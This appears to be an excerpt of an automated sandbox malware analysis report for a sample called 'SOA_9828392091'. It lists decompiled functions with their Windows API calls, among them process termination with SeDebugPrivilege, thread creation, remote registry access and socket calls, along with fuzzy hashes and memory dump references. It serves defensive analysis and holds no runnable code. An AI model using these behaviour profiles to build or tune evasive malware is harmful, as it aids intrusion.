                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                      • String ID:
                                      • API String ID: 793581249-0
                                      • Opcode ID: 2e5dde54bce45d1caa04c00a9b5c0622bf0fc2fc111586b6e73846f906490de5
                                      • Instruction ID: 7bed8ead649887d06dfb7cd58161ae52d34e2207acea83a49f9d03d559d6ec75
                                      • Opcode Fuzzy Hash: 2e5dde54bce45d1caa04c00a9b5c0622bf0fc2fc111586b6e73846f906490de5
                                      • Instruction Fuzzy Hash: 3F5143B39092195ADF50EB94D841EDEB3BC9F48310F1045EAFA49E3041EA7497C9CF60
                                      Function 0094EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 0094EAEB
                                      • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 0094EB32
                                      • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 009ADC86
                                      • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,009ADAD1,00000004,00000000,00000000), ref: 009ADCF2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: a9d70432e102c7476c3db70d4d6241f59e38d65876f30552edd617f7adce5570
                                      • Instruction ID: a658591f355d74d46cffbccb189cc23c40a681541360a952d691c30c3503228a
                                      • Opcode Fuzzy Hash: a9d70432e102c7476c3db70d4d6241f59e38d65876f30552edd617f7adce5570
                                      • Instruction Fuzzy Hash: F941097061A280DBDB354B2A8D8DF7A7AADFF43328F59490DF08782961D674BC40D751
                                      Function 0096B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B26C
                                      • RtlAllocateHeap.NTDLL(00000000,?,0096AEF1), ref: 0096B273
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0096AEF1,00000B00,?,?), ref: 0096B288
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B290
                                      • DuplicateHandle.KERNEL32(00000000,?,0096AEF1,00000B00,?,?), ref: 0096B293
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0096AEF1,00000B00,?,?), ref: 0096B2A3
                                      • GetCurrentProcess.KERNEL32(0096AEF1,00000000,?,0096AEF1,00000B00,?,?), ref: 0096B2AB
                                      • DuplicateHandle.KERNEL32(00000000,?,0096AEF1,00000B00,?,?), ref: 0096B2AE
                                      • CreateThread.KERNEL32(00000000,00000000,0096B2D4,00000000,00000000,00000000), ref: 0096B2C8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
                                      • String ID:
                                      • API String ID: 1422014791-0
                                      • Opcode ID: cf8394bf3a5d0b17ce47992cd49b48a7ac91b1bd239f8a830aff80d2f45dec17
                                      • Instruction ID: 3b05219d9b828f634ef90f3c262aa45c8444e91be7cc9b19f924e503ee815838
                                      • Opcode Fuzzy Hash: cf8394bf3a5d0b17ce47992cd49b48a7ac91b1bd239f8a830aff80d2f45dec17
                                      • Instruction Fuzzy Hash: 350119B5255308BFEB10AFA5DD4DF6B3BACEB88724F008511FA04DB1A1DA709800DB21
                                      Function 0098C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: NULL Pointer assignment$Not an Object type
                                      • API String ID: 0-572801152
                                      • Opcode ID: 1c018a4305c1d761d97e1d60d42c81c4a32cc6befc6029995de8b15b4d13b918
                                      • Instruction ID: 58587caa5679ec3289389df5e3619f74457602220fc0ccff59cf6cd26892c595
                                      • Opcode Fuzzy Hash: 1c018a4305c1d761d97e1d60d42c81c4a32cc6befc6029995de8b15b4d13b918
                                      • Instruction Fuzzy Hash: D1E1B6B1A00219AFDF14EFA4D885BAE77B9EF48314F148429F905A7381D774AD41CFA0
                                      Function 0098BB08 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit$_memset
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                      • API String ID: 2862541840-625585964
                                      • Opcode ID: fb822e085f78101c1507f270c86b5b0fc102cebddc2a4f73d3fabaccb4a9b037
                                      • Instruction ID: 6eb08172b05181f641a4fb0a3cf9a5a4e46c3597d188b58a86e8e80c9566513f
                                      • Opcode Fuzzy Hash: fb822e085f78101c1507f270c86b5b0fc102cebddc2a4f73d3fabaccb4a9b037
                                      • Instruction Fuzzy Hash: D691B071E00219AFDF24EFA5C848FAEBBB8EF85710F148559F515AB280DB749944CFA0
                                      Function 00999A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00999B19
                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00999B2D
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00999B47
                                      • _wcscat.LIBCMT ref: 00999BA2
                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00999BB9
                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00999BE7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window_wcscat
                                      • String ID: SysListView32
                                      • API String ID: 307300125-78025650
                                      • Opcode ID: 4f0f4bc5880f0bdbfc3a853d3e6b4b81ecbf3075e4577d1a305e253591d8f9d4
                                      • Instruction ID: af5c63e3416c601d426bf95fd8611e92cc4ad8b3dcd04cd03401d2fd341efbe1
                                      • Opcode Fuzzy Hash: 4f0f4bc5880f0bdbfc3a853d3e6b4b81ecbf3075e4577d1a305e253591d8f9d4
                                      • Instruction Fuzzy Hash: 60419E71940308EBDF219FA8DC85BEE77A8EF48350F10452AF989A7291D6759D84CB60
                                      Function 0099172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00976532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00976554
                                        • Part of subcall function 00976532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00976564
                                        • Part of subcall function 00976532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 009765F9
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0099179A
                                      • GetLastError.KERNEL32 ref: 009917AD
                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 009917D9
                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00991855
                                      • GetLastError.KERNEL32(00000000), ref: 00991860
                                      • CloseHandle.KERNEL32(00000000), ref: 00991895
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 2533919879-2896544425
                                      • Opcode ID: 0aedb5aa2445bbebcabea350b574e6ce86323905aa9db95cb390a42331e2d4c9
                                      • Instruction ID: dd9fb419e78ba8cc0abb900f97ee1ce3e709b7b6067bbd9cb8d5ff7a0e52532c
                                      • Opcode Fuzzy Hash: 0aedb5aa2445bbebcabea350b574e6ce86323905aa9db95cb390a42331e2d4c9
                                      • Instruction Fuzzy Hash: D041BD72600202AFDB05EF59C9D5F6DB7A5BF84310F08C098F9069F2D2DB74A9409B91
                                      Function 00975819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadIconW.USER32(00000000,00007F03), ref: 009758B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: IconLoad
                                      • String ID: blank$info$question$stop$warning
                                      • API String ID: 2457776203-404129466
                                      • Opcode ID: 22f727e80565cc66869ffa35bff4b222335944f588270ad22bb6cf9636298aa2
                                      • Instruction ID: cc653a02c9245e0df69afc6604e69bd208fabaef1bdb9022a56d65bf34cf2261
                                      • Opcode Fuzzy Hash: 22f727e80565cc66869ffa35bff4b222335944f588270ad22bb6cf9636298aa2
                                      • Instruction Fuzzy Hash: 68110D3320D746BBE7415B65DC83EEA339CAF95724B21803AF904E62C1F7E4AE004366
                                      Function 0097A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0097A806
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ArraySafeVartype
                                      • String ID:
                                      • API String ID: 1725837607-0
                                      • Opcode ID: ffd11ee58ec9d7d719dd2bbacd2e0bbd4e676db8ed98b548507eb5a7d02cd4b5
                                      • Instruction ID: 40e6816e221ea3a3d282f161378b430fdb31018bfcf31ed0c93c34be6253def9
                                      • Opcode Fuzzy Hash: ffd11ee58ec9d7d719dd2bbacd2e0bbd4e676db8ed98b548507eb5a7d02cd4b5
                                      • Instruction Fuzzy Hash: 69C1B176A0520ADFDB04CF98C481BAEB7F5FF89311F208469E609E7291D734A941CF92
                                      Function 00976B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00976B63
                                      • LoadStringW.USER32(00000000), ref: 00976B6A
                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00976B80
                                      • LoadStringW.USER32(00000000), ref: 00976B87
                                      • _wprintf.LIBCMT ref: 00976BAD
                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00976BCB
                                      Strings
                                      • %s (%d) : ==> %s: %s %s, xrefs: 00976BA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString$Message_wprintf
                                      • String ID: %s (%d) : ==> %s: %s %s
                                      • API String ID: 3648134473-3128320259
                                      • Opcode ID: 808ff289fd9deb694f97936491606d0a3bcefb1afb65ae5237e8a80704ab900c
                                      • Instruction ID: 7ddacd7d0fdbd07ed57426ba7a9b71c0d39221fe42a48ead35d695a1915a560f
                                      • Opcode Fuzzy Hash: 808ff289fd9deb694f97936491606d0a3bcefb1afb65ae5237e8a80704ab900c
                                      • Instruction Fuzzy Hash: EA011DF6904208BFEB11ABA49E89EF6776CE708304F4045A5B75AE2041EA749E849B71
                                      Function 00992B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00993C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00992BB5,?,?), ref: 00993C1D
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00992BF6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: BuffCharConnectRegistryUpper
                                      • String ID:
                                      • API String ID: 2595220575-0
                                      • Opcode ID: 02f9cdc07234e7260436487b54e08ef60c6e7f6b74ad4d29ecc92ff85e97fb44
                                      • Instruction ID: c366f346c60b24e2034a396db23059388ac61960ff344f4cb3a9bd876726d5aa
                                      • Opcode Fuzzy Hash: 02f9cdc07234e7260436487b54e08ef60c6e7f6b74ad4d29ecc92ff85e97fb44
                                      • Instruction Fuzzy Hash: A8916971604201AFCB04EF58C891B6EB7E9FF98310F14885DF9969B2A2DB34E945DF42
                                      Function 0095A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • __mtinitlocknum.LIBCMT ref: 0095A991
                                        • Part of subcall function 00957D7C: __FF_MSGBANNER.LIBCMT ref: 00957D91
                                        • Part of subcall function 00957D7C: __NMSG_WRITE.LIBCMT ref: 00957D98
                                        • Part of subcall function 00957D7C: __malloc_crt.LIBCMT ref: 00957DB8
                                      • __lock.LIBCMT ref: 0095A9A4
                                      • __lock.LIBCMT ref: 0095A9F0
                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,009E6DE0,00000018,00965E7B,?,00000000,00000109), ref: 0095AA0C
                                      • RtlEnterCriticalSection.NTDLL(8000000C), ref: 0095AA29
                                      • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 0095AA39
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                      • String ID:
                                      • API String ID: 1422805418-0
                                      • Opcode ID: 6f9dbe39bbc8f1f6f22bc368ee888007a7f2c2846e4a941429a7c1dacdd360d0
                                      • Instruction ID: ac30a6395adb9630977ffff41a060531e1d290b489aaf5bf23522ee3ce8a38d7
                                      • Opcode Fuzzy Hash: 6f9dbe39bbc8f1f6f22bc368ee888007a7f2c2846e4a941429a7c1dacdd360d0
                                      • Instruction Fuzzy Hash: 29416B719002059BEB10CF6ADE4076CB7B5AF41336F208319EC25AB2D2E7B49948CB99
                                      Function 00998ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00998EE4
                                      • GetDC.USER32(00000000), ref: 00998EEC
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00998EF7
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00998F03
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00998F3F
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00998F50
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0099BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00998F8A
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00998FAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: b872730996fe3bc7b9d1305332d831e1406de38db5ffd57103e20a788f18deab
                                      • Instruction ID: 26f6c58b99cc4f8c0d3c20e6f346bc3a524a0dbca66c3afd1ea09b40053b8072
                                      • Opcode Fuzzy Hash: b872730996fe3bc7b9d1305332d831e1406de38db5ffd57103e20a788f18deab
                                      • Instruction Fuzzy Hash: 20317C72105214BFEF108F54CD8AFAB3BADEB4A721F084169FE089A191D6759841CBB0
                                      Function 009895BF Relevance: 10.7, APIs: 7, Instructions: 247networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • select.WS2_32 ref: 00989691
                                      • WSAGetLastError.WS2_32(00000000), ref: 0098969E
                                      • __WSAFDIsSet.WS2_32(00000000,?), ref: 009896C8
                                      • WSAGetLastError.WS2_32(00000000), ref: 009896F8
                                      • htons.WS2_32(?), ref: 009897AA
                                      • inet_ntoa.WS2_32(?), ref: 00989765
                                        • Part of subcall function 0096D2FF: _strlen.LIBCMT ref: 0096D309
                                      • _strlen.LIBCMT ref: 00989800
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                      • String ID:
                                      • API String ID: 3480843537-0
                                      • Opcode ID: 1deb131caf2bf49147afb67c944d7000c63f4b513bb0cdbc94aabd8ca9f0b59a
                                      • Instruction ID: f3bffe8e81c4fd80a9a0a891ae0fdee8e714b8bae7208e8f2b431670975514e5
                                      • Opcode Fuzzy Hash: 1deb131caf2bf49147afb67c944d7000c63f4b513bb0cdbc94aabd8ca9f0b59a
                                      • Instruction Fuzzy Hash: FF81AB71508201ABC714EF64CC95F6BBBE8EFC9714F144A2DF5569B2A1EB30E904CB92
                                      Function 0094AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
